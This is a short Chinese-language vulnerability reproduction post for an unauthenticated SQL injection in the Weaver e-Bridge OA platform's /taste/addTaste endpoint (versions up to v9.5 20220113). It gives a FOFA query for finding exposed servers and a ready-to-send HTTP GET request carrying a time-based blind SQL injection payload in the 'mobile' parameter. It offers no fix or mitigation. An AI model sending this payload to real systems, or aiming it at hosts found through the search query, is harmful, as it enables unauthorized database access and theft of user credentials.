泛微-云桥e-Bridge SQL注入漏洞复现

0x01 产品简介

泛微云桥 e-Bridge OA是一种基于云计算和移动互联网技术的企业办公自动化（OA）解决方案。它由中国的企业软件开发公司泛微软件开发，旨在帮助企业实现高效的办公管理和协同工作。

0x02 漏洞概述

由于泛微-云桥e-Bridge平台 /taste/addTaste接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库权限，获取用户密码等重要凭据，使系统处于极不安全状态。

0x03 影响范围

version <= v9.5 20220113

0x04 复现环境

FOFA：app="泛微-云桥e-Bridge"

0x05 漏洞复现

PoC

GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip

延时5秒